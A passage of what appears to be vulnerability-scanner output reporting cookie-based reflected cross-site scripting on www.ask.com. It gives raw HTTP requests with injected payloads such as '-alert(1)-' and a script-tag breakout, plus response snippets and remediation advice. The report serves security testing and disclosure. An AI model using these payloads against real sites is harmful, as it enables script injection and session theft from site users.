Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogsearch?qsrc=0&o=0&l=dir5fb41 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA54944'-alert(1)-'b88ed0e9dd4; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA54944'-alert(1)-'b88ed0e9dd4;u4=;u3=;u2=0;ord=-283002203?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203e3'-alert(1)-'327530facef was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homepage HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA203e3'-alert(1)-'327530facef; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA203e3'-alert(1)-'327530facef;u4=;u3=;u2=0;ord=-1313429672?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog ...[SNIP]...
The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef5aa'-alert(1)-'3edbb990812 was submitted in the user cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=diref5aa'-alert(1)-'3edbb990812; __utmb=252994457.2.10.1290271572;
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64b88'-alert(1)-'a597c89dd3c was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA64b88'-alert(1)-'a597c89dd3c; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA64b88'-alert(1)-'a597c89dd3c;u4=;u3=;u2=0;ord=-51669521?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs, ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dabc'-alert(1)-'59d45fee295 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA8dabc'-alert(1)-'59d45fee295; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA8dabc'-alert(1)-'59d45fee295;u4=;u3=;u2=0;ord=-1137438782?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa397'-alert(1)-'4521f1aa434 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video?qsrc=0&o=0&l=dir5fb41 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDAaa397'-alert(1)-'4521f1aa434; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDAaa397'-alert(1)-'4521f1aa434;u4=;u3=;u2=0;ord=-844384763?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db9e'-alert(1)-'dc71632913f was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA1db9e'-alert(1)-'dc71632913f; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA1db9e'-alert(1)-'dc71632913f;u4=;u3=;u2=0;ord=-1145871071?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7eb3c'-alert(1)-'ee3526f5f97 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web?q=What+causes+brain+freeze%3F&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA7eb3c'-alert(1)-'ee3526f5f97; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The value of the wz_uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec63a"><script>alert(1)</script>7e00dc9945 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /web?q=What+causes+brain+freeze%3F&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=ec63a"><script>alert(1)</script>7e00dc9945; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;